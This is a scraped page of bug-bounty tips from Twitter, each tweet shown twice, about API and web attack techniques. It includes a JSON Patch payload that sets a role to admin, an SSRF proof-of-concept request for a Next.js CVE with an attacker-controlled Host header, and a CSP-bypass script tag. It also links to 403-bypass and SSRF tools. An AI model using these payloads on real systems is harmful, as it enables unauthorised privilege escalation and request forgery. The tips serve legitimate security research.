H4x0r.DZ๐Ÿ‡ฉ๐Ÿ‡ฟ(@h4x0r_dz) 's Twitter Profile Photo

many APIs are vulnerable to 'JSON Patch' where you have access to the op, you can add, remove, replace, move, copy

example :

{ 'op': 'replace', 'path': '/role', 'value': 'admin' },

more info :
datatracker.ietf.org/doc/html/rfc69โ€ฆ
jsonpatch.com

many APIs are vulnerable to 'JSON Patch' where you have access to the op, you can add, remove, replace, move, copy

example :

{ 'op': 'replace', 'path': '/role', 'value': 'admin' },

more info :
datatracker.ietf.org/doc/html/rfc69โ€ฆ
jsonpatch.com

#BugBounty #bugbountytips
account_circle
Dark Web Intelligence(@DailyDarkWeb) 's Twitter Profile Photo

403JUMP

403JUMP is a tool designed for penetration testers and bug bounty hunters to audit the security of web applications. It aims to bypass HTTP 403 (Forbidden) pages using various techniques.

github.com/trap-bytes/403โ€ฆ

403JUMP

403JUMP is a tool designed for penetration testers and bug bounty hunters to audit the security of web applications. It aims to bypass HTTP 403 (Forbidden) pages using various techniques.

github.com/trap-bytes/403โ€ฆ

#cybersecurity #infosec #pentest #bugbounty
account_circle
Fares Walid ๐Ÿ‡ช๐Ÿ‡ฌ๐Ÿ‡ต๐Ÿ‡ธ(@SirBagoza) 's Twitter Profile Photo

I made a nuclei template for checking

x-forwarded-host
x-forwarded-for

reflections in the response!
This may lead to SSRF or XSS or caching vulns!

link: github.com/SirBugs/Priv8-โ€ฆ

templates

I made a nuclei template for checking

x-forwarded-host
x-forwarded-for

reflections in the response!
This may lead to SSRF or XSS or caching vulns!

link: github.com/SirBugs/Priv8-โ€ฆ

#bugbounty #nuclei #nucleitemplates
account_circle
H4x0r.DZ๐Ÿ‡ฉ๐Ÿ‡ฟ(@h4x0r_dz) 's Twitter Profile Photo

CVE-2024-34351 : Server-Side Request Forgery on Next.js

github.com/vercel/next.jsโ€ฆ
assetnote.io/resources/reseโ€ฆ

POC:

POST /x HTTP/2
Host: attacker*com
Content-Length: 2
Next-Action: xxxx

{}

CVE-2024-34351 : Server-Side Request Forgery on Next.js 

github.com/vercel/next.jsโ€ฆ
assetnote.io/resources/reseโ€ฆ

POC:

POST /x HTTP/2
Host: attacker*com
Content-Length: 2
Next-Action: xxxx

{}
#BugBounty #bugbountytips
account_circle
HackenProof(@HackenProof) 's Twitter Profile Photo

[New bug bounty] Earn up to $15,000 with Aviator

You will be rewarded based on these tiers:

- Critical: $10,000 - $15,000
- High: $3,000 - $5,000
- Medium: $1,000 - $2,000
- Low: $500

Start the hunt right now!

[New bug bounty] Earn up to $15,000 with @aviator_ac

You will be rewarded based on these tiers:

- Critical: $10,000 - $15,000
- High: $3,000 - $5,000
- Medium: $1,000 - $2,000
- Low: $500

Start the #bugbounty hunt right now!
account_circle
Octagon Networks(@OctagonNetworks) 's Twitter Profile Photo

You can now bypass CSP on any website that allows https://*.facebook.com in a default or script-src ๐Ÿ”ฅ๐ŸŒŠ?

PoC: <script src=graph.facebook.com/?id=1337%26calโ€ฆ></script>

Exploitation is only possible using a novel technique we published:

octagon.net/blog/2022/05/2โ€ฆ

You can now bypass CSP on any website that allows https://*.facebook.com in a default or script-src ๐Ÿ”ฅ๐ŸŒŠ? 

PoC: <script src=graph.facebook.com/?id=1337%26calโ€ฆ></script>

Exploitation is only possible using a novel technique we published:  

octagon.net/blog/2022/05/2โ€ฆ #bugbountytip #BugBounty
account_circle
Ninad Mishra(@NinadMishra5) 's Twitter Profile Photo

SSRFmap by Swissky ๎จ€ is a modular SSRF scanner written in Python3 ๐Ÿ˜Ž

It is capable of identifying all types of SSRF vulnerabilities!

Including the ones found in popular services like Redis Server, Github, Zabbix!

github.com/swisskyrepo/SSโ€ฆ

SSRFmap by @pentest_swissky is a modular SSRF scanner written in Python3 ๐Ÿ˜Ž

It is capable of identifying all types of SSRF vulnerabilities! 

Including the ones found in popular services like Redis Server, Github, Zabbix! 

github.com/swisskyrepo/SSโ€ฆ

#bugbountytips #BugBounty
account_circle